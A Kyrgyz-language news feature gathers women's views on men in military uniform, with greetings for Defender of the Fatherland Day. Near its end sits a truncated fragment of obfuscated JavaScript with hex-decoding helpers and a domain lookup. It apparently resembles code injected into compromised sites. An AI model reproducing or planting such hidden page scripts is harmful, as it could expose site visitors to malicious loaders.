Аскер кийимчен жигиттер – айымдардын көзү менен

9-главное фото

Аскер кийимчен жигиттерди кандай кабыл аласыз, аларга мамилеңиз кандай, бийкеч кезиңизде жоокер жигиттерди кандай баалачу элеңиз?                                                       

9-Шайыр Касымалиева

 

Шайыр КАСЫМАЛИЕВА, актриса

– Негизинен эле жоо кийимин кийген эр-азаматтар ата-бабаларыбыздын учурунан бери жалпы журтка жакшы сезим тартуулап келген. Себеби, эл ишенген коргоочулар жоокерлер болгон эмеспи. Азыр да аскер кийимин кийген эр азаматтар эл журттун тынчтыгын коргоп, адамдын көз алдында көрктүү көрүнүшөт. Орусча айтканда, “доверие” пайда болот. Бүтүндөй мырзаларды майрамы менен чын дилден куттуктайм! Бар болгула!

 

12325424_337811126342682_192583019_n

Сонунбүбү КАДЫРОВА,  КР Жазуучулар союзунун мүчөсү, акын, ырчы

– Биздин жаш кезде аскер адамы өтө жогору бааланчу. Солдат жигиттерди кыздар суктана карашып, мени бир карап койсо экен деп турушчу. Алардын ичинде албетте мен да бар болчумун.  Бирок, тилекке каршы, аскер жигитине жолуга албадым. Ошондон калган адат болсо керек, азыр деле мага аскер кийимчен жигиттер сүрдүү көрүнөт. Кадимки эр азамат ушундай болуш керек деген ойго келе түшөсүң. Ылайым жерибизде  тынчтык болуп,  жигиттерибиз тынчтык күндүн бактылуу коргоочулары болуп жүрө беришсин. Биз тигиндей-мындай дегенибиз менен, элдин башына иш түшсө намыска жарачу жигиттерибиз арбын.

Ушул майрам күндү белгилеп, жигиттерибиздин  көңүлүн көтөрүп, сүйүүбүздү,  жакшы маанайыбызды,  каалоо-тилегибизди арноого милдеттүүбүз. Анткени мекендин чегинде туруу, аны коргоо оңой эмес. Өмүрүн тобокелге салып мекенди коргогон уулдарыбыз аман болсун ылайым!

9-Дильшат Кангелдиева

Дилшат КАНГЕЛДИЕВА, КР эмгек сиңирген артисти

– Кыргыздын патриот кызы катары айтсам, бала кезден эле аскер кийимчен жигиттерди баалачумун, сүйчүмүн, мен үчүн алар кол жеткис ыйык да, кадырлуу да, күчтүү да, өзгөчө накта кызгыздын мырзасы деген наамга ээ болоор эле. Азыр эне катары айсам, дагы деле мен үчүн биздин уулдарыбыз, жигиттерибиз ошондой эле көрүнөт. Ошол ыйык аскер кийимин кийген жигит элди, улутту сактайт дегенге татыктуу эр деп эсептейм.

Сиздерди терең урматтап, чың ден соолук, аманчылыгыңарды жана ар дайым жаныбызда бар болушуңарды тилейм, аскер кызматкерлерин, дегеле жалпы мырзаларды Ата Мекенди коргоочулардын майрамы менен чын жүрөгүмдөн куттуктайм!

9-Каныкей Бозгунова

Каныкей БОЗГУНОВА, “Марал” радиосунун алып баруучусу

– Жалпы эле аскер адамдарын биз Мекенди, элди, жерди коргоочулар деп билебиз жана аларга ишенип, таянабыз. Бирок, тилекке каршы, Кыргызстан эгемендүүлүк алгандан кийин аскерлердин баркы кетип, чындыгында аларга ишенич аз. Ал эми сүйгөн жигиттерин аскерге узатып, аны жылдап зарыгып күтүп, кат алышкан нерселерди биз кинодон көрүп, китептен окуп, же улуу муундардан эле угуп калдык, бизде азыр андай сезимдер жок.  Жеке өзүм үчүн аскер кийимчен жана башына ак калпак кийген жигиттер жүрөгүндө «кыргыз, мекен» деген жалындары бар эр азаматтар деп билем. Ошондой эле, кийген кийимине жараша өзүн татыктуу алып жүргөн болсо, аларга өзгөчө сый-урмат менен мамиле кылам жана сыймыктанам. Эр жигиттин намысы эл четинде, жоо бетинде сыналат. Ар кандай жамандыктан Кудай сактасын, бирок, биздин Мекен коргоочулар андайда жүрөгүндөгү жалыны менен Ата Журту үчүн күрөшкө даяр деп толук ишенем. Ошону менен бирге ар бир жигит милдеттүү түрдө аскерге барып, аскер кийимин кийип, аскердик жашоону жон териси менен сезип кызмат кылса деген ойдомун.

9-Элнура ШабиеваЭлнура ШАБИЕВА, адам укуктары боюнча кеңештин башкы бухгалтери 

– Мен аскер адамдарына бала кезден эле ѳзгѳчѳ көз караштамын. Мунун эки себеби бар: биринчиден, атам кесиптик лицейде аскер жетекчиси, экинчиден, чоң энем “А” деп арип тааныганыбыздан баштап эле балдар үчүн жазылган согуш учурларын чагылдырган китептерди тынбай окуттурчу. Ушу күнгѳ чейин “Эч ким, эч качан унутулбайт” деген китептеги аңгемелер эсимде.  Мен ошондо ойлочумун кандай гана эр жүрѳк, кандай гана тайманбас адамдар деп.

Албетте аскерде кызмат ѳтѳгѳн же аскердик окуу жайлардан билим алып жаткан, тулку бою келишип, чыкыйып түптүз баскан  эр-жигиттерди кѳргѳндѳ кыздар суктанат, балдардын болсо тымызын ичи күйѳт. Жеке мен үчүн – аскер адамын кѳргѳндѳгү эң биринчи эле  сезим – бул сыймыктануу. Алардын жанында ѳзүңдү коопсуз сезгенге ишеним жаралат. Ал эми майрамдагы аскердик жүрүштѳр же болбосо аскердик ант берүү аземи бардык эле адамдарды  толкундатат деп ойлойм.                                                                                 

9-Наргиза Исмаилова

Наргиза ИСМАИЛОВА, дизайнер

– Аскер кийимчен адамдарды көргөндө мендеги сезимдер көрккө бөлѳнѳт, себеби аскер адамдардын формасы ошол кийип жүргөн адамга сүр берет, аны күч-кубаттуу кѳрсѳтѳт. А эгер ошол эле адамды жөнөкөй граждандык кийим менен көрсөң, катардагы адамдардай эле кабыл аласың.  Мисалы, менин курбу кызым аскер кызматында бухгалтер болуп иштечү. Алар дагы формачан жүрүшөт эмеспи, аны менен чогуу жүргөнүбүздѳ  бизге балдар тийишчү эмес. Ал эми курбум демейки көйнөкчөн жүргөндө, бизге окшогон эле назик кыз болуп калчу.

9-Жыпара Исабаева

Жыпар ИСАБАЕВА, акын-жазуучу, журналист

– Секелек кезде кыздардын баары болочок күйөөсү тууралуу кыялданышат жана кыялдарында өз ханзаадасынын образын жаратып алышат. Мен да бала кезде: “Жолдошум форма кийген же ак халат кийген  жигит болсо” деп кыялданчумун. Айткандай эле, кийин жолдошум аскер адамы болду. Тактап айтканда, аскер фельдшери эле. Кээде форма, кээде ак халат кийчү.

Азыркы убакта, коомдогу ар кандай себептерден улам форманын баа-баркы бир аз түшүп кетти. Армияга болгон, кызмат кылууга болгон баягы ышкыбоздук, ак эткенден так эткен мекенчилдик күчүнөн тайыды. Милицияга болсо ишеним солгундап, түшүп калды. Ошондуктан азыркы кезде кыздар формачан жигиттер тууралуу кандай кыялданарын билбейм. Бирок мен ѳзүм жоокерлерди абдан сыйлайм. Алар биздин, мекендин, анын ичинде эне-баланын калканы деп аздектейм. Ошол эле учурда, ар бир формачан адамдын жандүйнөсүнөн чыныгы кыргыз жигиттерине таандык асылдыкты, баалуулукту, улуулукту, мекенчилдикти, ошол эле убакта ички маданиятты көргүм келет.  Баардык жоокерлерди, милиция кызматкерлерин, жалпы эр-азаматтардын баарын Мекенди коргоо деген улуу майрамы менен чын жүрөктөн куттуктайм!

“Соболчакты” уюштурган Айдар САГЫНБАЕВ

 

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kok-asaba.journalist.kg"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Комментарий кошуу

Сиздин электрондук почтаңыз жарыяланбайт. Милдеттүү талаалар белгиленген *